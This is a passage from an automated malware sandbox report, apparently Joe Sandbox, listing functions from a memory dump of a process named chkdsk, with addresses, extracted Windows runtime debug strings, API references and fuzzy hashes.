                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: a55eeb6fbe93bd780840e1587d3592dcb004a8e29fc6401e5afb2bcde13d3120
                                                      • Instruction ID: 9a3312461724511842ce46db3258b09e9582d5fb1e4fa9e77027c5d0b1b602a9
                                                      • Opcode Fuzzy Hash: a55eeb6fbe93bd780840e1587d3592dcb004a8e29fc6401e5afb2bcde13d3120
                                                      • Instruction Fuzzy Hash: A9E1B235608741AFD724CF28C848BAAB7E1BB84324F240A7EF995873D1D774E949CB52
                                                      Function 0541BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 05457BAC
                                                      • RTL: Resource at %p, xrefs: 05457B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05457B7F
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: de8b951505adfb9f73734d6e60fc9d1e11772c3b9115ace16589f70860da155a
                                                      • Instruction ID: f856a4577a4c84c905a6ca542c385a027bbe9ff861a3ec6545b42ed2949e2fea
                                                      • Opcode Fuzzy Hash: de8b951505adfb9f73734d6e60fc9d1e11772c3b9115ace16589f70860da155a
                                                      • Instruction Fuzzy Hash: 6D41BF317047029BC724CE26D844BABB7E6FB88720F000A6EE956DB781DB71E8058B95
                                                      Function 0541B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0545728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 054572C1
                                                      • RTL: Resource at %p, xrefs: 054572A3
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05457294
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 3124a94676c81cb7d9317096d291891abe001f8ccb44e32011e17d164d6e480e
                                                      • Instruction ID: f969be6ebf6bc33963b96d2385cd21a1e59e78cdadb307311399edfd31b9a547
                                                      • Opcode Fuzzy Hash: 3124a94676c81cb7d9317096d291891abe001f8ccb44e32011e17d164d6e480e
                                                      • Instruction Fuzzy Hash: DF41EF31704216ABC724CE26CC41FAAB7A6FB84760F10462EFC55EB741DB31E8069BD5
                                                      Function 05427D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: eb156fbc43944c0de6982911a4226b57fd1182f81a42db898c8ebfa615c6e78c
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 0C91B070E082369BDB24DE69C881AFFB7A2FF44320F95459BE855E73C4E73099428761
                                                      Function 053E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: adad2d82675d251ac7374a0406bb2bd0fae4d0239366563f2ec11d4ca7eab52b
                                                      • Instruction ID: fd90e6f59480a9d3d2aaa6c6e40596917001a7bbbf08ee0f537743dfb2efec7b
                                                      • Opcode Fuzzy Hash: adad2d82675d251ac7374a0406bb2bd0fae4d0239366563f2ec11d4ca7eab52b
                                                      • Instruction Fuzzy Hash: FF812A76D04269DBDB25DB54CC49BEEB7B9AF08750F0041EAE919B7280D7709E84CFA0
                                                      Function 0546CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0546CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      • Opcode ID: 8c0c0d5b85cca0b72cadc8aedf286047e94bbf0d46b3484d418c6bbec1278516
                                                      • Instruction ID: b252699b81bbcf6ce4b78f3e0d174640a543c4c5612001150a5dee2dbdc7519f
                                                      • Opcode Fuzzy Hash: 8c0c0d5b85cca0b72cadc8aedf286047e94bbf0d46b3484d418c6bbec1278516
                                                      • Instruction Fuzzy Hash: 09419B71E00228DFCB25DFA5C984AEEBBB8FF45B14F10446BE905DB254D7748901DB62